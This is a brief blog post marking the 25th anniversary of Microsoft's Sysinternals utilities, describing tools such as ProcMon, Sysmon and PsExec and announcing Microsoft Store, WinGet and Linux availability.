Sysinternals has had its 25th birthday last week! There even was an event.
But the great thing is, there’s some new development. But first, what is Sysinternals exactly?
Sysinternals is a suite of advanced utilities for Windows and Windows Server. This initiative started about 25 years ago by Mark Russinovich. Nowadays he works for Microsoft as the Azure CTO. Famous utilities are ProcMon (short for process monitor), SysMon (short for system monitor), PsExec (start any process as another user or system, notoriously used by hackers, but a swiss army knife for sysadmins nonetheless) and BgInfo (have system info as desktop background). RDCMan, a popular remote desktop utility used by sysadmins and alike for managing many RDP connections, was adopted by Sysinternals lately.
And now the great news:
- The Sysinternals Suite is available in the Microsoft Store. Added benefit is easier update management.
- Not only that, but it’s also available with Microsoft package manager for Windows, WinGet. Although WinGet is still in preview, it sounds promising.
- There is a linux version of Sysmon, Sysmon for Linux. There is even an option to integrate with Azure Sentinel. ProcMon and ProcDump were already available for linux. I’m expecting more utilities to be ported to Linux.